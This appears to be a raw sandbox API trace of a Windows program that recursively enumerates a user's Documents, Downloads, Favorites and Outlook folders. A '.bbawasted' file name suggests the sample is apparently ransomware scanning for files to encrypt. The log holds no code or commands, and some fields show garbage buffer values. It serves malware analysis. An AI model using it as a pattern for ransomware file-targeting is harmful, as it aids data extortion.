cFileName="姐䨜࿠ꢰ䝑ഷ葫⦈鱎⣧ᐔ᷎ᬱഐ튽푺筝抮ᠼ쒘쫺뙚徐ᢳ롔㿻蜥쉯ꄩ鲺姠粇빐㼎辍ᬄ䄚畷쌛䪲䬊쬔뾥띐ﯙ䣖ꌱ묊鯀⃲嚞쬀ὀ싉嶞壧朣䏿ⷪ婚蔒뽭뱀䏙鋜뵑⌯巛뤜冦虣퀩㶀鎗憛ᕭ凷謎⁺㠅쪨␄췘⏨例䩳᧬뱌吰㫡뎨ꇓ櫾婓窄⃽嬫╖贙ጵ栲펽佩毂?깂耧⚭澵럌㮖貁気Ꝏ䇖孾ᒼ?퍨킘莁溠ᙻ闏ᛎ椉䷜暨㷆斂쟅⶙⵽༧⥇?뀒丣⃆惵阓毷ᖳ㝓㥳놟㗵큸줄섗膞⨀槏澅漎?ꍹ笅ᑾ⭣◘觀蟉ਇ撕?ሾ?螭抖滮᠗您쏀逸౤썇䷇냻걲徙ᡣ䂳と骱폏㸧?㒕趶ᾇ鸊桛䀿?줒뾸얺?包귤貧䪔쌉ㅟ醹뀃㮬⭱촄⼁섡ꆫ♇䧨鄮巸㗌㩤綾⁻焗ﲊ킔鵩୿䂭歭䶳棔捘꤇캁?៿縟঑᷸误ꘐ㛪╷釶谇ꝍ⸁", cAlternateFileName="꤇캁?៿縟঑᷸误ꘐ㛪╷釶谇ꝍ⸁")) returned 0xffffffff [0067.985] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c75e0 | out: hHeap=0x580000) returned 1 [0067.985] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0067.985] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.985] lstrlenW (lpString="My Shapes") returned 9 [0067.985] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x5c75e0 | out: lpFindFileData=0x5c75e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7371289, dwReserved1=0x6b41d860, cFileName=".", cAlternateFileName="")) returned 0x5c7208 [0067.989] FindNextFileW (in: hFindFile=0x5c7208, lpFindFileData=0x5c75e0 | out: lpFindFileData=0x5c75e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7371289, dwReserved1=0x6b41d860, cFileName="..", cAlternateFileName="")) returned 1 [0067.989] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.990] FindNextFileW (in: hFindFile=0x5c7208, lpFindFileData=0x5c75e0 | out: lpFindFileData=0x5c75e0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x7371289, dwReserved1=0x6b41d860, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.003] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.003] lstrlenW (lpString="desktop.ini") returned 11 [0068.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x5c7838 | out: lpFindFileData=0x5c7838*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xef4fb90a, dwReserved1=0xa47bb1e2, cFileName=".", cAlternateFileName="")) returned 0x5c9e38 [0068.033] FindNextFileW (in: hFindFile=0x5c9e38, lpFindFileData=0x5c7838 | out: lpFindFileData=0x5c7838*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xef4fb90a, dwReserved1=0xa47bb1e2, cFileName="..", cAlternateFileName="")) returned 1 [0068.033] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.033] FindNextFileW (in: hFindFile=0x5c9e38, lpFindFileData=0x5c7838 | out: lpFindFileData=0x5c7838*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xef4fb90a, dwReserved1=0xa47bb1e2, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0068.033] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.033] lstrlenW (lpString="folder.ico") returned 10 [0068.033] FindClose (in: hFindFile=0x5c9e38 | out: hFindFile=0x5c9e38) returned 1 [0068.033] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c7838 | out: hHeap=0x580000) returned 1 [0068.033] FindNextFileW (in: hFindFile=0x5c7208, lpFindFileData=0x5c75e0 | out: lpFindFileData=0x5c75e0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7371289, dwReserved1=0x6b41d860, cFileName="_private", cAlternateFileName="")) returned 0 [0068.033] FindClose (in: hFindFile=0x5c7208 | out: hFindFile=0x5c7208) returned 1 [0068.033] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c75e0 | out: hHeap=0x580000) returned 1 [0068.033] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0068.034] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.034] lstrlenW (lpString="My Videos") returned 9 [0068.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x5c75e0, ftCreationTime.dwLowDateTime=0x5be700, ftCreationTime.dwHighDateTime=0x3a0043, ftLastAccessTime.dwLowDateTime=0x4d005c, ftLastAccessTime.dwHighDateTime=0x4f0053, ftLastWriteTime.dwLowDateTime=0x610043, ftLastWriteTime.dwHighDateTime=0x680063, nFileSizeHigh=0x5c0065, nFileSizeLow=0x6c0041, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="ers\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.bbawasted", cAlternateFileName="噤㝏摶㕪獺歒⼫䵦ぐ汏汖楋敢偄꛰䒜⸁")) returned 0xffffffff [0068.034] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf6a8 | out: hHeap=0x580000) returned 1 [0068.034] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7f5a030, ftCreationTime.dwHighDateTime=0x1d5bbd3, ftLastAccessTime.dwLowDateTime=0x1ad4c040, ftLastAccessTime.dwHighDateTime=0x1d565c9, ftLastWriteTime.dwLowDateTime=0x1ad4c040, ftLastWriteTime.dwHighDateTime=0x1d565c9, nFileSizeHigh=0x0, nFileSizeLow=0x1305c, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="nepcSl5.docx", cAlternateFileName="NEPCSL~1.DOC")) returned 1 [0068.034] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.034] lstrlenW (lpString="nepcSl5.docx") returned 12 [0068.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x5c0288 [0068.034] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0068.034] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.035] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0068.035] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.035] lstrlenW (lpString="voeimd@djhreuu.uhd.pst") returned 22 [0068.035] FindClose (in: hFindFile=0x5c0288 | out: hFindFile=0x5c0288) returned 1 [0068.035] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf6a8 | out: hHeap=0x580000) returned 1 [0068.035] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48a3f6a0, ftCreationTime.dwHighDateTime=0x1d5a05f, ftLastAccessTime.dwLowDateTime=0xf281c410, ftLastAccessTime.dwHighDateTime=0x1d5a0d0, ftLastWriteTime.dwLowDateTime=0xf281c410, ftLastWriteTime.dwHighDateTime=0x1d5a0d0, nFileSizeHigh=0x0, nFileSizeLow=0x4392, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="PUbWuWs.docx", cAlternateFileName="PUBWUW~1.DOC")) returned 1 [0068.035] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.035] lstrlenW (lpString="PUbWuWs.docx") returned 12 [0068.035] FindClose (in: hFindFile=0x5a4060 | out: hFindFile=0x5a4060) returned 1 [0068.035] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0068.035] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0068.035] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.035] lstrlenW (lpString="Downloads") returned 9 [0068.035] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName=".", cAlternateFileName="")) returned 0x5c0288 [0068.036] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="..", cAlternateFileName="")) returned 1 [0068.036] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.036] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.036] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.036] lstrlenW (lpString="desktop.ini") returned 11 [0068.036] FindClose (in: hFindFile=0x5c0288 | out: hFindFile=0x5c0288) returned 1 [0068.036] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0068.036] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0068.036] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.036] lstrlenW (lpString="Favorites") returned 9 [0068.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName=".", cAlternateFileName="")) returned 0x5c0288 [0068.036] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="..", cAlternateFileName="")) returned 1 [0068.036] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.037] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.037] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.037] lstrlenW (lpString="desktop.ini") returned 11 [0068.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x5a4060 [0068.037] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0068.037] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.037] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.037] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.037] lstrlenW (lpString="desktop.ini") returned 11 [0068.037] FindClose (in: hFindFile=0x5a4060 | out: hFindFile=0x5a4060) returned 1 [0068.037] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf6a8 | out: hHeap=0x580000) returned 1 [0068.037] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0068.037] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.037] lstrlenW (lpString="Microsoft Websites") returned 18 [0068.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x5a4060 [0068.283] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0068.284] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.284] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0068.284] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.284] lstrlenW (lpString="IE Add-on site.url") returned 18 [0068.284] FindClose (in: hFindFile=0x5a4060 | out: hFindFile=0x5a4060) returned 1 [0068.285] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf6a8 | out: hHeap=0x580000) returned 1 [0068.285] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0068.285] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.285] lstrlenW (lpString="MSN Websites") returned 12 [0068.285] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x5b9718 [0068.330] FindNextFileW (in: hFindFile=0x5b9718, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0068.330] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.330] FindNextFileW (in: hFindFile=0x5b9718, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0068.330] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.331] lstrlenW (lpString="MSN Autos.url") returned 13 [0068.331] FindClose (in: hFindFile=0x5b9718 | out: hFindFile=0x5b9718) returned 1 [0068.331] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf6a8 | out: hHeap=0x580000) returned 1 [0068.331] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, 